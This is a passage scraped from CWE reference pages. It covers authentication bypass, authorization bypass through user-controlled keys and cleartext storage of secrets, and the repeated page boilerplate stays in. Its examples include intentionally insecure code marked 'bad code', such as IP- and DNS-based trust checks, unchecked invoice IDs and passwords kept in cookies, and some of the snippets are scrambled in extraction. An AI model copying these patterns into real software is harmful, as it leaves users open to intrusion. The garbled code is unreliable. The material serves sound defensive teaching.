exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-305: Authentication Bypass by Primary Weakness
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-290: Authentication Bypass by Spoofing
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThis attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code authenticates users. (bad code)
Example Language: Java
String sourceIP = request.getRemoteAddr();
if (sourceIP != null && sourceIP.equals(APPROVED_IP)) { authenticated = true; }The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism. Example 2 Both of these examples check if a request is from a trusted address before responding to the request. (bad code)
Example Language: C
sd = socket(AF_INET, SOCK_DGRAM, 0);
serv.sin_family = AF_INET; serv.sin_addr.s_addr = htonl(INADDR_ANY); servr.sin_port = htons(1008); bind(sd, (struct sockaddr *) & serv, sizeof(serv)); while (1) { memset(msg, 0x0, MAX_MSG); }clilen = sizeof(cli); if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) { n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); }(bad code)
Example Language: Java
while(true) {
DatagramPacket rp=new DatagramPacket(rData,rData.length);
outSock.receive(rp); String in = new String(p.getData(),0, rp.getLength()); InetAddress clientIPAddress = rp.getAddress(); int port = rp.getPort(); if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) { out = secret.getBytes(); }DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp); The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. Example 3 The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. (bad code)
Example Language: C
struct hostent *hp;struct in_addr myaddr;
char* tHost = "trustme.example.com"; myaddr.s_addr=inet_addr(ip_addr_string); hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET); if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) { trusted = true; } else {trusted = false; }(bad code)
Example Language: Java
String ip = request.getRemoteAddr();
InetAddress addr = InetAddress.getByName(ip); if (addr.getCanonicalHostName().endsWith("trustme.com")) { trusted = true; }(bad code)
Example Language: C#
IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);
IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); if (hostInfo.HostName.EndsWith("trustme.com")) { trusted = true; }IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-288: Authentication Bypass Using an Alternate Path or Channel
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1
Register SECURE_ME is located at address 0xF00. A mirror of this register called COPY_OF_SECURE_ME is at location 0x800F00. The register SECURE_ME is protected from malicious agents and only allows access to select, while COPY_OF_SECURE_ME is not. Access control is implemented using an allowlist (as indicated by acl_oh_allowlist). The identity of the initiator of the transaction is indicated by the one hot input, incoming_id. This is checked against the acl_oh_allowlist (which contains a list of initiators that are allowed to access the asset). Though this example is shown in Verilog, it will apply to VHDL as well. (informative)
Example Language: Verilog
module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n);
output [31:0] data_out; input [31:0] data_in, incoming_id, address; input clk, rst_n; wire write_auth, addr_auth; reg [31:0] data_out, acl_oh_allowlist, q; assign write_auth = | (incoming_id & acl_oh_allowlist) ? 1 : 0; always @*
acl_oh_allowlist <= 32'h8312;
assign addr_auth = (address == 32'hF00) ? 1: 0;always @ (posedge clk or negedge rst_n)
if (!rst_n)
endmodule
begin
else
q <= 32'h0;
enddata_out <= 32'h0;
begin
end
q <= (addr_auth & write_auth) ? data_in: q;
enddata_out <= q; (bad code)
Example Language: Verilog
assign addr_auth = (address == 32'hF00) ? 1: 0;
The bugged line of code is repeated in the Bad example above. Weakness arises from the fact that the SECURE_ME register can be modified by writing to the shadow register COPY_OF_SECURE_ME, the address of COPY_OF_SECURE_ME should also be included in the check. That buggy line of code should instead be replaced as shown in the Good Code Snippet below. (good code)
Example Language: Verilog
assign addr_auth = (address == 32'hF00 || address == 32'h800F00) ? 1: 0;
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-639: Authorization Bypass Through User-Controlled Key
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system. For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value. One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user's session and read/modify their data.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user. (bad code)
Example Language: C#
...
conn = new SqlConnection(_ConnectionString); conn.Open(); int16 id = System.Convert.ToInt16(invoiceID.Text); SqlCommand query = new SqlCommand( "SELECT * FROM invoices WHERE id = @id", conn); query.Parameters.AddWithValue("@id", id); SqlDataReader objReader = objCommand.ExecuteReader(); ... The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-566: Authorization Bypass Through User-Controlled SQL Primary Key
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.
When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records. Database access control errors occur when:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user. (bad code)
Example Language: C#
...
conn = new SqlConnection(_ConnectionString); conn.Open(); int16 id = System.Convert.ToInt16(invoiceID.Text); SqlCommand query = new SqlCommand( "SELECT * FROM invoices WHERE id = @id", conn); query.Parameters.AddWithValue("@id", id); SqlDataReader objReader = objCommand.ExecuteReader(); ... The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-300: Channel Accessible by Non-Endpoint
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.
In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the Java snippet below, data is sent over an unencrypted channel to a remote server. (bad code)
Example Language: Java
Socket sock;
PrintWriter out; try { sock = new Socket(REMOTE_HOST, REMOTE_PORT);
out = new PrintWriter(echoSocket.getOutputStream(), true); // Write data to remote host via socket output stream. ... By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses.
CWE-313: Cleartext Storage in a File or on Disk
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).
CWE-312: Cleartext Storage of Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt stores a plaintext user account ID in a browser cookie. (bad code)
Example Language: Java
response.addCookie( new Cookie("userAccountID", acctID);
Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. Example 2 This code writes a user's login information to a cookie so the user does not have to login again later. (bad code)
Example Language: PHP
function persistLogin($username, $password){
$data = array("username" => $username, "password"=> $password); }setcookie ("userdata", $data); The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). Example 3 The following code attempts to establish a connection, read in a password, then store it to a buffer. (bad code)
Example Language: C
server.sin_family = AF_INET; hp = gethostbyname(argv[1]);
if (hp==NULL) error("Unknown host"); memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length); if (argc < 3) port = 80; else port = (unsigned short)atoi(argv[3]); server.sin_port = htons(port); if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting"); ... while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { write(dfd,password_buffer,n); ... While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. Example 4 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Example 5 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. At least one OT product stored a password in plaintext. Example 6 In 2021, a web site operated by PeopleGIS stored data of US municipalities in Amazon Web Service (AWS) Simple Storage Service (S3) buckets. (bad code)
Example Language: Other
A security researcher found 86 S3 buckets that could be accessed without authentication (CWE-306) and stored data unencrypted (CWE-312). These buckets exposed over 1000 GB of data and 1.6 million files including physical addresses, phone numbers, tax documents, pictures of driver's license IDs, etc. [REF-1296] [REF-1295]
While it was not publicly disclosed how the data was protected after discovery, multiple options could have been considered. (good code)
Example Language: Other
The sensitive information could have been protected by ensuring that the buckets did not have public read access, e.g., by enabling the s3-account-level-public-access-blocks-periodic rule to Block Public Access. In addition, the data could have been encrypted at rest using the appropriate S3 settings, e.g., by enabling server-side encryption using the s3-bucket-server-side-encryption-enabled setting. Other settings are available to further prevent bucket data from being leaked. [REF-1297]
Example 7 Consider the following PowerShell command examples for encryption scopes of Azure storage objects. In the first example, an encryption scope is set for the storage account. (bad code)
Example Language: Shell
New-AzStorageEncryptionScope -ResourceGroupName "MyResourceGroup" -AccountName "MyStorageAccount" -EncryptionScopeName testscope -StorageEncryption
The result (edited and formatted for readability) might be: (bad code)
Example Language: Other
ResourceGroupName: MyResourceGroup, StorageAccountName: MyStorageAccount
However, the empty string under RequireInfrastructureEncryption indicates this service was not enabled at the time of creation, because the -RequireInfrastructureEncryption argument was not specified in the command. Including the -RequireInfrastructureEncryption argument addresses the issue: (good code)
Example Language: Shell
New-AzStorageEncryptionScope -ResourceGroupName "MyResourceGroup" -AccountName "MyStorageAccount" -EncryptionScopeName testscope -StorageEncryption -RequireInfrastructureEncryption
This produces the report: (result)
Example Language: Other
ResourceGroupName: MyResourceGroup, StorageAccountName: MyStorageAccount
In a scenario where both software and hardware layer encryption is required ("double encryption"), Azure's infrastructure encryption setting can be enabled via the CLI or Portal. An important note is that infrastructure hardware encryption cannot be enabled or disabled after a blob is created. Furthermore, the default value for infrastructure encryption is disabled in blob creations. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).
Other
When organizations adopt cloud services, it can be easier for attackers to access the data from anywhere on the Internet.
CWE-315: Cleartext Storage of Sensitive Information in a Cookie
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
